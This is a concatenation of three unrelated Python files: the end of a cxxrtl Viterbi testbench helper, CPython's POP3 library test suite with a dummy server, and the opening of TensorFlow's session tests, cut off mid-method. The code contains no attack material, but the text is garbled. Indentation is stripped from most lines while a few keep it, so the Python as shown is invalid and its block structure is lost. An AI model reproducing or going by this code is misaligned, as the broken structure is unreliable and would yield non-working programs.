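            # -1 and +1 respectively, skipping any other framing characters.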
result = [1 if x == 49 else -1 for x in line if x == 48 or x == 49]
decoded.extend(result)
out.close()
# Call out to cxxrtl process
cxxrtl_exec = subprocess.Popen(
cxxrtl_tb_filename, stdout=subprocess.PIPE, stdin=subprocess.PIPE
)
# Thread to decode the output
t = Thread(target=decode_output, args=(cxxrtl_exec.stdout, decoded))
t.daemon = True # thread dies with the program
t.start()
# Chunked input
size = 2 ** 14
for pos in range(0, len(cxxrtl_bytes), size):
cxxrtl_exec.stdin.write(cxxrtl_bytes[pos : pos + size])
cxxrtl_exec.stdin.write(b"\n")
# Close stdin
try:
cxxrtl_exec.stdin.close()
    except OSError:
pass
# Wait for stdout to close
while not cxxrtl_exec.stdout.closed:
pass
cxxrtl_exec.wait()
return np.array(decoded)
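# Illustrative usage; "./viterbi_tb" is a placeholder path to the compiled
# cxxrtl testbench and the input is an assumed binary (0/1) coded sequence.
def _example_decode():
    coded = np.random.randint(0, 2, size=1024)
    return viterbi_cxxrtl_tb(coded, "./viterbi_tb")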
|
test_poplib.py
|
"""Test script for poplib module."""
# Modified by Giampaolo Rodola' to give poplib.POP3 and poplib.POP3_SSL
# a real test suite
import poplib
import asyncore
import asynchat
import socket
import os
import time
import errno
from unittest import TestCase
from test import support as test_support
threading = test_support.import_module('threading')
HOST = test_support.HOST
PORT = 0
# the dummy data returned by server when LIST and RETR commands are issued
LIST_RESP = b'1 1\r\n2 2\r\n3 3\r\n4 4\r\n5 5\r\n.\r\n'
RETR_RESP = b"""From: postmaster@python.org\
\r\nContent-Type: text/plain\r\n\
MIME-Version: 1.0\r\n\
Subject: Dummy\r\n\
\r\n\
line1\r\n\
line2\r\n\
line3\r\n\
.\r\n"""
class DummyPOP3Handler(asynchat.async_chat):
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
self.set_terminator(b"\r\n")
self.in_buffer = []
self.push('+OK dummy pop3 server ready. <timestamp>')
def collect_incoming_data(self, data):
self.in_buffer.append(data)
def found_terminator(self):
line = b''.join(self.in_buffer)
line = str(line, 'ISO-8859-1')
self.in_buffer = []
cmd = line.split(' ')[0].lower()
space = line.find(' ')
if space != -1:
arg = line[space + 1:]
else:
arg = ""
if hasattr(self, 'cmd_' + cmd):
method = getattr(self, 'cmd_' + cmd)
method(arg)
else:
self.push('-ERR unrecognized POP3 command "%s".' %cmd)
def handle_error(self):
raise
def push(self, data):
asynchat.async_chat.push(self, data.encode("ISO-8859-1") + b'\r\n')
def cmd_echo(self, arg):
# sends back the received string (used by the test suite)
self.push(arg)
def cmd_user(self, arg):
if arg != "guido":
self.push("-ERR no such user")
self.push('+OK password required')
def cmd_pass(self, arg):
if arg != "python":
self.push("-ERR wrong password")
self.push('+OK 10 messages')
def cmd_stat(self, arg):
self.push('+OK 10 100')
def cmd_list(self, arg):
if arg:
self.push('+OK %s %s' % (arg, arg))
else:
self.push('+OK')
asynchat.async_chat.push(self, LIST_RESP)
cmd_uidl = cmd_list
def cmd_retr(self, arg):
self.push('+OK %s bytes' %len(RETR_RESP))
asynchat.async_chat.push(self, RETR_RESP)
cmd_top = cmd_retr
def cmd_dele(self, arg):
self.push('+OK message marked for deletion.')
def cmd_noop(self, arg):
self.push('+OK done nothing.')
def cmd_rpop(self, arg):
self.push('+OK done nothing.')
def cmd_apop(self, arg):
self.push('+OK done nothing.')
def cmd_quit(self, arg):
self.push('+OK closing.')
self.close_when_done()
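# For reference, a sketch of the client-side conversation the handler above
# emulates (illustrative only; the host is a placeholder):
def _example_pop3_session():
    box = poplib.POP3('pop.example.com', timeout=10)
    box.user('guido')
    box.pass_('python')
    _resp, listings, _octets = box.list()
    for entry in listings:
        _resp, lines, _octets = box.retr(int(entry.split()[0]))
        print(b'\r\n'.join(lines).decode('ascii', 'replace'))
    box.quit()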
class DummyPOP3Server(asyncore.dispatcher, threading.Thread):
handler = DummyPOP3Handler
def __init__(self, address, af=socket.AF_INET):
threading.Thread.__init__(self)
asyncore.dispatcher.__init__(self)
self.create_socket(af, socket.SOCK_STREAM)
self.bind(address)
self.listen(5)
self.active = False
self.active_lock = threading.Lock()
self.host, self.port = self.socket.getsockname()[:2]
self.handler_instance = None
def start(self):
assert not self.active
self.__flag = threading.Event()
threading.Thread.start(self)
self.__flag.wait()
def run(self):
self.active = True
self.__flag.set()
while self.active and asyncore.socket_map:
self.active_lock.acquire()
asyncore.loop(timeout=0.1, count=1)
self.active_lock.release()
asyncore.close_all(ignore_all=True)
def stop(self):
assert self.active
self.active = False
self.join()
def handle_accepted(self, conn, addr):
self.handler_instance = self.handler(conn)
def handle_connect(self):
self.close()
handle_read = handle_connect
def writable(self):
return 0
def handle_error(self):
raise
class TestPOP3Class(TestCase):
def assertOK(self, resp):
self.assertTrue(resp.startswith(b"+OK"))
def setUp(self):
self.server = DummyPOP3Server((HOST, PORT))
self.server.start()
self.client = poplib.POP3(self.server.host, self.server.port, timeout=3)
def tearDown(self):
self.client.close()
self.server.stop()
def test_getwelcome(self):
self.assertEqual(self.client.getwelcome(),
b'+OK dummy pop3 server ready. <timestamp>')
def test_exceptions(self):
self.assertRaises(poplib.error_proto, self.client._shortcmd, 'echo -err')
def test_user(self):
self.assertOK(self.client.user('guido'))
self.assertRaises(poplib.error_proto, self.client.user, 'invalid')
def test_pass_(self):
self.assertOK(self.client.pass_('python'))
self.assertRaises(poplib.error_proto, self.client.user, 'invalid')
def test_stat(self):
self.assertEqual(self.client.stat(), (10, 100))
def test_list(self):
self.assertEqual(self.client.list()[1:],
([b'1 1', b'2 2', b'3 3', b'4 4', b'5 5'],
25))
self.assertTrue(self.client.list('1').endswith(b"OK 1 1"))
def test_retr(self):
expected = (b'+OK 116 bytes',
[b'From: postmaster@python.org', b'Content-Type: text/plain',
b'MIME-Version: 1.0', b'Subject: Dummy',
b'', b'line1', b'line2', b'line3'],
113)
foo = self.client.retr('foo')
self.assertEqual(foo, expected)
def test_too_long_lines(self):
self.assertRaises(poplib.error_proto, self.client._shortcmd,
'echo +%s' % ((poplib._MAXLINE + 10) * 'a'))
def test_dele(self):
self.assertOK(self.client.dele('foo'))
def test_noop(self):
self.assertOK(self.client.noop())
def test_rpop(self):
self.assertOK(self.client.rpop('foo'))
def test_apop(self):
self.assertOK(self.client.apop('foo', 'dummypassword'))
def test_top(self):
expected = (b'+OK 116 bytes',
[b'From: postmaster@python.org', b'Content-Type: text/plain',
b'MIME-Version: 1.0', b'Subject: Dummy', b'',
b'line1', b'line2', b'line3'],
113)
self.assertEqual(self.client.top(1, 1), expected)
def test_uidl(self):
self.client.uidl()
self.client.uidl('foo')
def test_quit(self):
resp = self.client.quit()
self.assertTrue(resp)
self.assertIsNone(self.client.sock)
self.assertIsNone(self.client.file)
SUPPORTS_SSL = False
if hasattr(poplib, 'POP3_SSL'):
import ssl
SUPPORTS_SSL = True
CERTFILE = os.path.join(os.path.dirname(__file__) or os.curdir, "keycert.pem")
class DummyPOP3_SSLHandler(DummyPOP3Handler):
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
ssl_socket = ssl.wrap_socket(self.socket, certfile=CERTFILE,
server_side=True,
do_handshake_on_connect=False)
self.del_channel()
self.set_socket(ssl_socket)
# Must try handshake before calling push()
self._ssl_accepting = True
self._do_ssl_handshake()
self.set_terminator(b"\r\n")
self.in_buffer = []
self.push('+OK dummy pop3 server ready. <timestamp>')
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
elif err.args[0] == ssl.SSL_ERROR_EOF:
return self.handle_close()
raise
except socket.error as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
DummyPOP3Handler.handle_read(self)
class TestPOP3_SSLClass(TestPOP3Class):
# repeat previous tests by using poplib.POP3_SSL
def setUp(self):
self.server = DummyPOP3Server((HOST, PORT))
self.server.handler = DummyPOP3_SSLHandler
self.server.start()
self.client = poplib.POP3_SSL(self.server.host, self.server.port)
def test__all__(self):
self.assertIn('POP3_SSL', poplib.__all__)
def test_context(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host,
self.server.port, keyfile=CERTFILE, context=ctx)
self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host,
self.server.port, certfile=CERTFILE, context=ctx)
self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host,
self.server.port, keyfile=CERTFILE,
certfile=CERTFILE, context=ctx)
self.client.quit()
self.client = poplib.POP3_SSL(self.server.host, self.server.port,
context=ctx)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.assertIs(self.client.sock.context, ctx)
self.assertTrue(self.client.noop().startswith(b'+OK'))
class TestTimeouts(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.settimeout(60)  # Safety net. See issue 11812.
self.port = test_support.bind_port(self.sock)
self.thread = threading.Thread(target=self.server, args=(self.evt,self.sock))
self.thread.setDaemon(True)
self.thread.start()
self.evt.wait()
def tearDown(self):
self.thread.join()
del self.thread # Clear out any dangling Thread objects.
def server(self, evt, serv):
serv.listen(5)
evt.set()
try:
conn, addr = serv.accept()
conn.send(b"+ Hola mundo\n")
conn.close()
except socket.timeout:
pass
finally:
serv.close()
def testTimeoutDefault(self):
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
pop = poplib.POP3(HOST, self.port)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(pop.sock.gettimeout(), 30)
pop.sock.close()
def testTimeoutNone(self):
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
pop = poplib.POP3(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertTrue(pop.sock.gettimeout() is None)
pop.sock.close()
def testTimeoutValue(self):
pop = poplib.POP3(HOST, self.port, timeout=30)
self.assertEqual(pop.sock.gettimeout(), 30)
pop.sock.close()
def test_main():
tests = [TestPOP3Class, TestTimeouts]
if SUPPORTS_SSL:
tests.append(TestPOP3_SSLClass)
thread_info = test_support.threading_setup()
try:
test_support.run_unittest(*tests)
finally:
test_support.threading_cleanup(*thread_info)
if __name__ == '__main__':
test_main()
|
session_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.python.client.session.Session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import random
import os
import sys
import threading
import time
import warnings
import numpy as np
import six
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.framework import attr_value_pb2
from tensorflow.core.lib.core import error_codes_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import device as framework_device_lib
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import function
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import test_util
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import gen_control_flow_ops
# Import gradients to resolve circular imports
from tensorflow.python.ops import gradients # pylint: disable=unused-import
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import math_ops
# Import resource_variable_ops for the variables-to-tensor implicit conversion.
from tensorflow.python.ops import resource_variable_ops # pylint: disable=unused-import
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
try:
import attr # pylint:disable=g-import-not-at-top
except ImportError:
attr = None
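# `attr` (the third-party `attrs` package) is optional; the attrs-based fetch
# tests below skip themselves when it is not installed.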
class SessionTest(test_util.TensorFlowTestCase):
def setUp(self):
super(SessionTest, self).setUp()
warnings.simplefilter('always')
def testUseExistingGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session(graph=g):
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testUseDefaultGraph(self):
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session():
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testCreate(self):
with session.Session():
inp = constant_op.constant(10.0, shape=[2, 3], name='W1')
copy = array_ops.identity(inp)
# Test with feed.
# TODO(mrry): Investigate why order='F' didn't work.
arr = np.asarray([[0, 1, 2], [3, 4, 5]], dtype=np.float32, order='C')
copy_val = copy.eval({'W1:0': arr})
self.assertAllEqual(arr, copy_val)
# Test without feed.
copy_val = copy.eval()
self.assertAllEqual(
np.asarray(
[[10.0, 10.0, 10.0], [10.0, 10.0, 10.0]], dtype=np.float32),
copy_val)
def testManyCPUs(self):
with session.Session(
config=config_pb2.ConfigProto(device_count={
'CPU': 2, 'GPU': 0
})) as sess:
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp, 10.0)
num_cpu_devices = 0
num_gpu_devices = 0
for device in sess.list_devices():
device_type = framework_device_lib.DeviceSpec.from_string(
device.name).device_type
if device_type == 'CPU':
num_cpu_devices += 1
elif device_type == 'GPU':
num_gpu_devices += 1
self.assertEqual(2, num_cpu_devices)
self.assertEqual(0, num_gpu_devices)
def testPerSessionThreads(self):
with session.Session(
config=config_pb2.ConfigProto(use_per_session_threads=True)):
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp, 10.0)
def testSessionInterOpThreadPool(self):
config_pb = config_pb2.ConfigProto()
pool = config_pb.session_inter_op_thread_pool.add()
with session.Session(config=config_pb) as s:
inp = constant_op.constant(10.0, name='W1')
results = s.run([inp])
self.assertAllEqual([10.0], results)
pool = config_pb.session_inter_op_thread_pool.add()
pool.num_threads = 1
with session.Session(config=config_pb) as s:
inp = constant_op.constant(20.0, name='W2')
results = s.run([inp])
self.assertAllEqual([20.0], results)
pool = config_pb.session_inter_op_thread_pool.add()
pool.num_threads = 1
pool.global_name = 't1'
run_options = config_pb2.RunOptions()
run_options.inter_op_thread_pool = (
len(config_pb.session_inter_op_thread_pool) - 1)
with session.Session(config=config_pb) as s:
inp = constant_op.constant(30.0, name='W2')
results = s.run([inp], options=run_options)
self.assertAllEqual([30.0], results)
def testErrorsReported(self):
with session.Session() as s:
constant_op.constant(10.0, name='W1')
with self.assertRaises(ValueError):
s.run('foo:0')
def testErrorPayload(self):
with session.Session():
a = array_ops.placeholder(dtypes.float32)
with self.assertRaisesOpError(lambda e: e.op == a.op):
a.eval()
def testErrorCodeWithNoNodeDef(self):
with session.Session() as s:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
def exc_predicate(e):
return (e.op is None and e.node_def is None and
e.error_code == error_codes_pb2.INVALID_ARGUMENT)
with self.assertRaisesOpError(exc_predicate):
# Run with a bogus handle.
s.partial_run('foo', r1, feed_dict={a: 1, b: 2})
def testErrorBasedOn(self):
with session.Session() as sess:
a = constant_op.constant(0.0, shape=[2, 3])
# NOTE(mrry): The original_op is nonsense, but used here to test that the
# errors are reported correctly.
with sess.graph._original_op(a.op):
b = array_ops.identity(a, name='id')
with sess.graph._original_op(b.op):
c = array_ops.placeholder(dtypes.float32)
def exc_predicate(e):
return (e.op == c.op and e.op._original_op == b.op and
e.op._original_op._original_op == a.op)
with self.assertRaisesOpError(exc_predicate):
c.eval()
def testFetchNone(self):
with session.Session() as s:
a = constant_op.constant(1.0)
with self.assertRaises(TypeError):
s.run(None)
with self.assertRaises(TypeError):
s.run([None])
with self.assertRaises(TypeError):
s.run({'b': None})
with self.assertRaises(TypeError):
s.run({'a': a, 'b': None})
def testFetchSingleton(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
res = sess.run(a)
self.assertEqual(42.0, res)
res = sess.run(a.op) # An op, not a tensor.
self.assertEqual(None, res)
tensor_runner = sess.make_callable(a)
res = tensor_runner()
self.assertEqual(42.0, res)
op_runner = sess.make_callable(a.op)
res = op_runner()
self.assertEqual(None, res)
def testFetchSingletonByName(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
res = sess.run(a.name)
self.assertEqual(42.0, res)
res = sess.run(a.op) # An op, not a tensor.
self.assertEqual(None, res)
def testFetchList(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
v = variables.Variable([54.0])
assign = v.assign([63.0])
res = sess.run([a, b, c, a.name, assign.op])
self.assertTrue(isinstance(res, list))
self.assertEqual([42.0, None, 44.0, 42.0, None], res)
list_runner = sess.make_callable([a, b, c, a.name, assign.op])
res = list_runner()
self.assertTrue(isinstance(res, list))
self.assertEqual([42.0, None, 44.0, 42.0, None], res)
def testFetchTuple(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run((a, b, c, a.name))
self.assertTrue(isinstance(res, tuple))
self.assertEqual((42.0, None, 44.0, 42.0), res)
tuple_runner = sess.make_callable((a, b, c, a.name))
res = tuple_runner()
self.assertTrue(isinstance(res, tuple))
self.assertEqual((42.0, None, 44.0, 42.0), res)
def testFetchNamedTuple(self):
# pylint: disable=invalid-name
ABC = collections.namedtuple('ABC', ['a', 'b', 'c'])
# pylint: enable=invalid-name
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run(ABC(a, b, c))
self.assertTrue(isinstance(res, ABC))
self.assertEqual(42.0, res.a)
self.assertEqual(None, res.b)
self.assertEqual(44.0, res.c)
namedtuple_runner = sess.make_callable(ABC(a, b, c))
res = namedtuple_runner()
self.assertTrue(isinstance(res, ABC))
self.assertEqual(42.0, res.a)
self.assertEqual(None, res.b)
self.assertEqual(44.0, res.c)
def testFetchDict(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run({'a': a, 'b': b, 'c': c})
self.assertTrue(isinstance(res, dict))
self.assertEqual(42.0, res['a'])
self.assertEqual(None, res['b'])
self.assertEqual(44.0, res['c'])
def testFetchOrderedDict(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run(collections.OrderedDict([(3, a), (2, b), (1, c)]))
self.assertTrue(isinstance(res, collections.OrderedDict))
self.assertEqual([3, 2, 1], list(res.keys()))
self.assertEqual(42.0, res[3])
self.assertEqual(None, res[2])
self.assertEqual(44.0, res[1])
@test_util.run_v1_only('b/120545219')
def testFetchAttrs(self):
if attr is None:
self.skipTest('attr module is unavailable.')
@attr.s
class SampleAttr(object):
field1 = attr.ib()
field2 = attr.ib()
val1 = np.array([1.2, 3.4, 5.6])
val2 = np.array([[1, 2], [4, 3]])
val3 = np.array([10, 20, 30])
t1 = constant_op.constant(val1)
t2 = constant_op.constant(val2)
sample = SampleAttr(t1, t2)
with session.Session() as sess:
result = sess.run(sample)
self.assertIsInstance(result, SampleAttr)
self.assertAllEqual(val1, result.field1)
self.assertAllEqual(val2, result.field2)
result = sess.run(sample, feed_dict={sample.field1: val3})
self.assertIsInstance(result, SampleAttr)
self.assertAllEqual(val3, result.field1)
self.assertAllEqual(val2, result.field2)
@test_util.run_v1_only('b/120545219')
def testFetchNestedAttrs(self):
if attr is None:
self.skipTest('attr module is unavailable.')
@attr.s
class SampleAttr(object):
field0 = attr.ib()
field1 = attr.ib()
v1 = 10
v2 = 20
v3 = np.float32(1.2)
v4 = np.float32(3.4)
v5 = np.float64(100.001)
v6 = np.float64(-23.451)
arr1 = np.array([1.2, 6.7, 3.4])
arr2 = np.array([7, 11, 3])
sample = SampleAttr(
SampleAttr(
SampleAttr(constant_op.constant(v1), constant_op.constant(v2)),
SampleAttr(constant_op.constant(arr1), constant_op.constant(arr2))),
{'A': SampleAttr(constant_op.constant(v3), constant_op.constant(v4)),
'B': [SampleAttr(constant_op.constant(v5), constant_op.constant(v6))]})
with session.Session() as sess:
result = sess.run(sample)
self.assertIsInstance(result, SampleAttr)
self.assertIsInstance(result.field0, SampleAttr)
self.assertIsInstance(result.field0.field0, SampleAttr)
self.assertIsInstance(result.field0.field1, SampleAttr)
self.assertIsInstance(result.field0.field1.field0, np.ndarray)
self.assertAllEqual(arr1, result.field0.field1.field0)
self.assertIsInstance(result.field0.field1.field1, np.ndarray)
self.assertAllEqual(arr2, result.field0.field1.field1)
self.assertIsInstance(result.field1, dict)
self.assertIn('A', result.field1)
self.assertIn('B', result.field1)
self.assertIsInstance(result.field1['A'], SampleAttr)
self.assertAllEqual(
[v3, v4],
[result.field1['A'].field0, result.field1['A'].field1])
self.assertIsInstance(result.field1['B'], list)
self.assertEqual(1, len(result.field1['B']))
self.assertIsInstance(result.field1['B'][0], SampleAttr)
self.assertAllEqual(
[v5, v6],
[result.field1['B'][0].field0, result.field1['B'][0].field1])
def testFetchNestingEmptyOneLevel(self):
with session.Session() as sess:
a_val = 11.0
a = constant_op.constant(a_val)
res = sess.run([[], tuple(), {}])
self.assertTrue(isinstance(res, list))
self.assertEqual(3, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(0, len(res[0]))
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(0, len(res[1]))
self.assertTrue(isinstance(res[2], dict))
self.assertEqual(0, len(res[2]))
res = sess.run([[], tuple(), {}, a])
self.assertTrue(isinstance(res, list))
self.assertEqual(4, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(0, len(res[0]))
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(0, len(res[1]))
self.assertTrue(isinstance(res[2], dict))
self.assertEqual(0, len(res[2]))
self.assertEqual(a_val, res[3])
def testFetchNestingOneLevel(self):
with session.Session() as sess:
# pylint: disable=invalid-name
ABC = collections.namedtuple('ABC', ['a', 'b', 'c'])
DEFG = collections.namedtuple('DEFG', ['d', 'e', 'f', 'g'])
# pylint: enable=invalid-name
a_val = 42.0
b_val = None
c_val = 44.0
a = constant_op.constant(a_val)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(c_val)
# List of lists, tuples, namedtuple, and dict
res = sess.run([[a, b, c], (a, b, c),
ABC(a=a, b=b, c=c), {
'a': a.name,
'c': c,
'b': b
}])
self.assertTrue(isinstance(res, list))
self.assertEqual(4, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(3, len(res[0]))
self.assertEqual(a_val, res[0][0])
self.assertEqual(b_val, res[0][1])
self.assertEqual(c_val, res[0][2])
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(3, len(res[1]))
self.assertEqual(a_val, res[1][0])
self.assertEqual(b_val, res[1][1])
self.assertEqual(c_val, res[1][2])
self.assertTrue(isinstance(res[2], ABC))
self.assertEqual(a_val, res[2].a)
self.assertEqual(b_val, res[2].b)
self.assertEqual(c_val, res[2].c)
self.assertTrue(isinstance(res[3], dict))
self.assertEqual(3, len(res[3]))
self.assertEqual(a_val, res[3]['a'])
self.assertEqual(b_val, res[3]['b'])
self.assertEqual(c_val, res[3]['c'])
# Tuple of lists, tuples, namedtuple, and dict
res = sess.run(([a, b, c], (a.name, b, c), ABC(a=a, b=b, c=c), {
'a': a,
'c': c,
'b': b
}))
self.assertTrue(isinstance(res, tuple))
self.assertEqual(4, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(3, len(res[0]))
self.assertEqual(a_val, res[0][0])
self.assertEqual(b_val, res[0][1])
self.assertEqual(c_val, res[0][2])
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(3, len(res[1]))
self.assertEqual(a_val, res[1][0])
self.assertEqual(b_val, res[1][1])
self.assertEqual(c_val, res[1][2])
self.assertTrue(isinstance(res[2], ABC))
self.assertEqual(a_val, res[2].a)
self.assertEqual(b_val, res[2].b)
self.assertEqual(c_val, res[2].c)
self.assertTrue(isinstance(res[3], dict))
self.assertEqual(3, len(res[3]))
self.assertEqual(a_val, res[3]['a'])
self.assertEqual(b_val, res[3]['b'])
self.assertEqual(c_val, res[3]['c'])
# Namedtuple of lists, tuples, namedtuples, and dict
res = sess.run(
DEFG(
d=[a, b, c],
e=(a, b, c),
f=ABC(a=a.name, b=b, c=c),
g={
'a': a,
'c': c,
'b': b
}))
self.assertTrue(isinstance(res, DEFG))
self.assertTrue(isinstance(res.d, list))
self.assertEqual(3, len(res.d))
self.assertEqual(a_val, res.d[0])
self.assertEqual(b_val, res.d[1])
self.assertEqual(c_val, res.d[2])
self.assertTrue(isinstance(res.e, tuple))
self.assertEqual(3, len(res.e))
self.assertEqual(a_val, res.e[0])
self.assertEqual(b_val, res.e[1])
self.assertEqual(c_val, res.e[2])
self.assertTrue(isinstance(res.f, ABC))
self.assertEqual(a_val, res.f.a)
self.assertEqual(b_val, res.f.b)
self.assertEqual(c_val, res.f.c)
self.assertTrue(isinstance(res.g, dict))
self.assertEqual(3, len(res.g))
self.assertEqual(a_val, res.g['a'])
self.assertEqual(b_val, res.g['b'])
self.assertEqual(c_val, res.g['c'])
# Dict of lists, tuples, namedtuples, and dict
res = sess.run({
'd': [a, b, c],
'e': (a, b, c),
'f': ABC(a=a, b=b, c=c),
'g': {
'a': a.name,
'c': c,
'b': b
}
})
self.assertTrue(isinstance(res, dict))
self.assertEqual(4, len(res))
self.assertTrue(isinstance(res['d'], list))
self.assertEqual(3, len(res['d']))
self.assertEqual(a_val, res['d'][0])
self.assertEqual(b_val, res['d'][1])
self.assertEqual(c_val, res['d'][2])
self.assertTrue(isinstance(res['e'], tuple))
self.assertEqual(3, len(res['e']))
self.assertEqual(a_val, res['e'][0])
self.assertEqual(b_val, res['e'][1])
self.assertEqual(c_val, res['e'][2])
self.assertTrue(isinstance(res['f'], ABC))
self.assertEqual(a_val, res['f'].a)
self.assertEqual(b_val, res['f'].b)
self.assertEqual(c_val, res['f'].c)
self.assertTrue(isinstance(res['g'], dict))
self.assertEqual(3, len(res['g']))
self.assertEqual(a_val, res['g']['a'])
self.assertEqual(b_val, res['g']['b'])
self.assertEqual(c_val, res['g']['c'])
def testFetchTensorObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
results_with_list = s.run([c])
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_list[0])
results_with_single = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_single)
results_with_get = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_get)
a_val, b_val = s.run([a, b]) # Test multiple fetches.
self.assertAllEqual([[1.0, 1.0]], a_val)
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]], b_val)
results_with_dict = s.run({'a': [a], 'b': b, 'z': [a, b]})
self.assertAllEqual([[1.0, 1.0]], results_with_dict['a'][0])
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]],
results_with_dict['b'])
self.assertAllEqual(results_with_dict['a'][0], results_with_dict['z'][0])
self.assertAllEqual(results_with_dict['b'], results_with_dict['z'][1])
# Test nested structures
results_with_nested_list = s.run([[[a, b], b], a, [a, b]])
self.assertAllEqual([[1.0, 1.0]], results_with_nested_list[0][0][0])
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]],
results_with_nested_list[0][0][1])
self.assertAllEqual(results_with_nested_list[0][0][0],
results_with_nested_list[1])
self.assertAllEqual(results_with_nested_list[1],
results_with_nested_list[2][0])
self.assertAllEqual(results_with_nested_list[0][0][1],
results_with_nested_list[0][1])
self.assertAllEqual(results_with_nested_list[0][1],
results_with_nested_list[2][1])
def testFetchScalar(self):
with session.Session() as s:
for scalar in np.int32, np.int64, np.float16, np.float32, np.float64:
x = scalar(7)
y = scalar(8)
tf_x = constant_op.constant(x, shape=[])
tf_y = constant_op.constant(y)
tf_xy = math_ops.add(tf_x, tf_y)
# Single fetch
xy = s.run(tf_xy)
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# List fetch
xy, = s.run([tf_xy])
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# Dict fetch
xy = s.run({'xy': tf_xy})['xy']
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# Nested list fetch
xy = s.run([[[tf_xy]], tf_xy, [tf_xy]])
self.assertAllEqual(xy, [[[x + y]], x + y, [x + y]])
self.assertEqual(scalar, type(xy[0][0][0]))
self.assertEqual(scalar, type(xy[1]))
self.assertEqual(scalar, type(xy[2][0]))
def testFetchOperationObject(self):
with session.Session() as s:
